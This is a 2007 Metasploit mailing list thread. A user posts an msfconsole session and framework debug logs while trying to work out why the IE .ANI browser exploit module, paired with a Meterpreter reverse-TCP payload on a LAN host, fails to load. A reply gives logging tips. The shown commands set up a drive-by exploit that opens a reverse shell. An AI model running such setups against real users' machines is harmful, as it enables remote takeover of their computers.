Metasploit mailing list archives

favicon.ico handler & meterpreter reverse_tcp encoder problems


From: jlbrown1980 at comcast.net (jlbrown1980)
Date: Mon, 14 May 2007 12:44:00 -0400

Alright here is my log and a screenshot with what is going on.

This is what was entered into the attacking shell..
                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|

       =[ msf v3.1-dev
+ -- --=[ 192 exploits - 106 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 36 aux

msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(ani_loadimage_chunksize) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.105    yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH                   no        The URI to use for this exploit (default


Payload options:

   Name      Current Setting                              Required  Description
   ----      ---------------                              --------  -----------
   DLL       /usr/local/msf3/data/meterpreter/metsrv.dll  yes       The local pa
   EXITFUNC  process                                      yes       Exit techni
   LHOST     192.168.1.105                                yes       The local ad
   LPORT     4444                                         yes       The local po


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.105:8080/WGP0OVb7Z5YluSF
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >

This is the output in framework.log with LogLevel set to 3 from start to
finish.

[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Ppc::LongXor from /usr/local/msf3/modules/encoders/ppc/longxor.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Ppc::LongXorTag from /usr/local/msf3/modules/encoders/ppc/longxor_tag.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Sparc::LongXorTag from /usr/local/msf3/modules/encoders/sparc/longxor_tag.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::NonUpper from /usr/local/msf3/modules/encoders/x86/nonupper.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::ShikataGaNai from /usr/local/msf3/modules/encoders/x86/shikata_ga_nai.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AlphaUpper from /usr/local/msf3/modules/encoders/x86/alpha_upper.rb.
[05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::FnstenvMov from /usr/local/msf3/modules/encoders/x86/fnstenv_mov.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::UnicodeUpper from /usr/local/msf3/modules/encoders/x86/unicode_upper.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::JmpCallAdditive from /usr/local/msf3/modules/encoders/x86/jmp_call_additive.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::Call4Dword from /usr/local/msf3/modules/encoders/x86/call4_dword_xor.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::NonAlpha from /usr/local/msf3/modules/encoders/x86/nonalpha.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AvoidUtf8 from /usr/local/msf3/modules/encoders/x86/avoid_utf8_tolower.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::UnicodeMixed from /usr/local/msf3/modules/encoders/x86/unicode_mixed.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::Countdown from /usr/local/msf3/modules/encoders/x86/countdown.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AlphaMixed from /usr/local/msf3/modules/encoders/x86/alpha_mixed.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Generic::None from /usr/local/msf3/modules/encoders/generic/none.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Cmd::GenericSh from /usr/local/msf3/modules/encoders/cmd/generic_sh.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Ppc::Simple from /usr/local/msf3/modules/nops/ppc/simple.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Sparc::Vlad902 from /usr/local/msf3/modules/nops/sparc/random.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::X86::SingleByte from /usr/local/msf3/modules/nops/x86/single_byte.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::X86::Opty2 from /usr/local/msf3/modules/nops/x86/opty2.rb.
[05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Php::Generic from /usr/local/msf3/modules/nops/php/generic.rb.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module encoder/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module payload/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module exploit/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(2)] core: Loading from file /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
[05/14/2007 12:26:31] [i(2)] core: Loaded exploit module Msf::Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 from /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module nop/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:31] [d(1)] core: Demand loading module auxiliary/windows/browser/ani_loadimage_chunksize.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module encoder/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module payload/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(2)] core: Loading from file /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb
[05/14/2007 12:26:45] [i(2)] core: Loaded payload module Msf::Payloads::Stagers::Windows::ReverseTcp from /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb.
[05/14/2007 12:26:45] [d(2)] core: Loading from file /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb
[05/14/2007 12:26:45] [i(2)] core: Loaded payload module Msf::Payloads::Stages::Windows::Meterpreter from /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb.
[05/14/2007 12:26:45] [d(3)] core: Checking compat [ with ]: sockedi to sockedi
[05/14/2007 12:26:45] [d(2)] core: Built staged payload windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [w(3)] core: Missing value for payload offset LHOST, skipping.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module exploit/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module nop/windows/meterpreter/reverse_tcp.
[05/14/2007 12:26:45] [d(1)] core: Demand loading module auxiliary/windows/meterpreter/reverse_tcp.

Screenshot of activity:
http://img385.imageshack.us/my.php?image=screenshotde0.png

So that's where I'm at, still can't figure out why it's not loading the
exploit properly.


Kurt Grutzmacher <grutz[at]jingojango.net> wrote:

It would probably be a lot easier to SSH into your unix box from the
Windows platform. You'll not have to walk as often and then be able to
troubleshoot tons faster.

Copy/paste your msfconsole session. Also do a "setg LogLevel 3", close
and re-open msfconsole and run the exploit again. Check
~/.msf/logs/framework.log for errors.

-- 
                ..:[ grutz at jingojango dot net ]:..
   GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
      "There's just no amusing way to say, 'I have a CISSP'."